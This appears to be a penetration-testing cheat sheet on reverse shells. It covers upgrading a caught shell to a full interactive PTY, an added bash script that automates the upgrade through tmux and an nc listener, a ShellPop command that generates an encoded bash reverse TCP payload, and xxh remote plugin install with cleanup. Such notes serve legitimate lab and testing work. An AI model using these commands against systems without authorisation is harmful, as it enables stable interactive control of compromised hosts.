# Shells

## Upgrade to PTY

* <https://forum.hackthebox.eu/discussion/comment/22312#Comment_22312>
* <https://xakep.ru/2019/07/16/mischief/#toc05.1>
* <https://securixy.kz/hack-faq/apgrejd-reverse-shell-do-interaktivnogo-tty.html/>
* <https://infosecwriteups.com/using-tmux-for-automating-interactive-reverse-shells-630260740af3>

```bash
# 1. Spawn a PTY on the remote side (python3, then python as fallback)
user@remote:~$ if python3 -V > /dev/null 2>&1; then
  python3 -c 'import pty; pty.spawn("/bin/bash")'
elif python -V > /dev/null 2>&1; then
  python -c 'import pty; pty.spawn("/bin/bash")'
fi
# or, when there is no python at all
user@remote:~$ script -q /dev/null /bin/bash

# 2. Background the remote shell (Ctrl-Z suspends the local nc/socat process)
user@remote:~$ ^Z

# 3. Read rows and cols from the local terminal; you will need them in step 6
root@kali:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

# 4. Put the local terminal into raw mode with echo off, then foreground the shell.
#    Raw mode passes Ctrl-C, Ctrl-Z, Tab and the arrow keys through to the remote
#    side instead of letting the local tty act on them.
root@kali:~$ stty raw -echo; fg

# 5. Set TERM so Ctrl-L, clear and curses-based tools work (pick one value)
user@remote:~$ export TERM=xterm   # or xterm-color / xterm-256color

# 6. (optional) Reset the remote terminal. Do it after TERM is set, otherwise
#    reset prompts for the terminal type.
user@remote:~$ reset

# 7. Set rows and columns (values from step 3) for proper text alignment
user@remote:~$ stty rows ${ROWS} cols ${COLS}

# 8. (optional) Replace the shell with a fresh bash process image (-l for a login shell)
user@remote:~$ exec /bin/bash [-l]
```
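The steps above are the same every time, so they lend themselves to automation with tmux (the idea behind the infosecwriteups link). The script below is an added example and not part of the original page: it opens a tmux window running a local shell, starts the listener there, waits for the callback, and types the upgrade sequence into the pane with `tmux send-keys`, taking the geometry from the terminal the script is launched in. The function names (`spawn_pty_cmd`, `remote_fixup_cmd`, `local_geometry`, `upgrade_in_tmux`), the window name and the use of `ss` to detect the established connection are all my assumptions; it expects `tmux`, `nc` and `ss` on the attacker box and must be run from inside a tmux session.

```bash
#!/usr/bin/env bash
# Added example (not from the page): drive the manual PTY upgrade from tmux.
# Assumed helper names and tools: tmux, nc -lvnp, ss (iproute2).

# Remote-side one-liner: python3, then python, then script(1) as last resort.
spawn_pty_cmd() {
  printf '%s' "python3 -c 'import pty; pty.spawn(\"/bin/bash\")' 2>/dev/null || python -c 'import pty; pty.spawn(\"/bin/bash\")' 2>/dev/null || script -q /dev/null /bin/bash"
}

# Remote-side fix-up: TERM first (so reset does not prompt), then geometry, then reset.
# $1 = rows, $2 = cols, $3 = TERM value (default xterm-256color).
remote_fixup_cmd() {
  printf 'export TERM=%s; stty rows %s cols %s; reset' "${3:-xterm-256color}" "$1" "$2"
}

# Rows and cols of the terminal we are typing in. stty size needs a tty on stdin;
# fall back to tput and finally to 24x80 (constructed defaults) when there is none.
local_geometry() {
  stty size 2>/dev/null || printf '%s %s\n' \
    "$(tput lines 2>/dev/null || echo 24)" \
    "$(tput cols 2>/dev/null || echo 80)"
}

# Run the whole procedure in a fresh tmux window. $1 = listener port, $2 = window name.
upgrade_in_tmux() {
  local port="$1" win="${2:-revshell}" rows cols
  set -- $(local_geometry)          # the new window shares the client size, so this matches
  rows="$1"; cols="$2"

  tmux new-window -d -n "$win"      # a pane running OUR local interactive shell (job control needed for fg)
  tmux send-keys -t "$win" "nc -lvnp $port" Enter

  # Wait for the callback: poll for an established TCP connection with local port $port.
  until ss -Htn state established "( sport = :$port )" | grep -q .; do sleep 1; done

  tmux send-keys -t "$win" "$(spawn_pty_cmd)" Enter       # typed into the remote shell
  sleep 2
  tmux send-keys -t "$win" C-z                             # step 2: suspend nc locally
  sleep 1
  tmux send-keys -t "$win" 'stty raw -echo; fg' Enter      # step 4: local tty raw, resume nc
  sleep 1
  tmux send-keys -t "$win" "$(remote_fixup_cmd "$rows" "$cols")" Enter   # steps 5-7, now reaching the remote side
  tmux select-window -t "$win"
}

# Usage: ./upgrade.sh 9001   (from inside tmux). With no argument only the functions are defined.
if [ -n "${1:-}" ]; then
  upgrade_in_tmux "$1"
fi
```

When the remote shell dies the local pane is still in raw mode with echo off; type `stty sane` (blind, then Enter) or `reset` in that pane to get the local terminal back. The sleeps are there because `send-keys` is fire-and-forget: the suspended nc must be in the background before `fg` is typed, and `fg` must have resumed it before the fix-up line is sent, or that line ends up in the local shell instead of the remote one.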

## Tools

* <http://www.jackson-t.ca/runtime-exec-payloads.html>

### ShellPop

* <https://github.com/0x00-0x00/ShellPop>

Bash reverse TCP example:

```bash
# --number picks payload no. 8 from `shellpop --list`; --base64 encodes the payload
$ shellpop -H 10.10.13.37 -P 9001 --reverse --number 8 --base64
```

### pwncat

* <https://securixy.kz/hack-faq/pwncat-netcat-na-steroidah.html/>
* <https://github.com/cytopia/pwncat>

### xxh

* <https://github.com/xxh/xxh>

```bash
$ pipx install xxh-xxh
# -i id_rsa is passed to ssh; +I installs the named xxh package (plugin) on the host,
# +if forces a reinstall, +q keeps it quiet, +vv makes it verbose
$ source xxh.zsh -i id_rsa snovvcrash@192.168.1.11 +I xxh-plugin-zsh-ohmyzsh +if [+q/+vv]
# Clean up: remove the xxh install directory from the remote home
$ ssh -i id_cthulhu snovvcrash@192.168.1.11 -f "rm -rf .xxh"
```
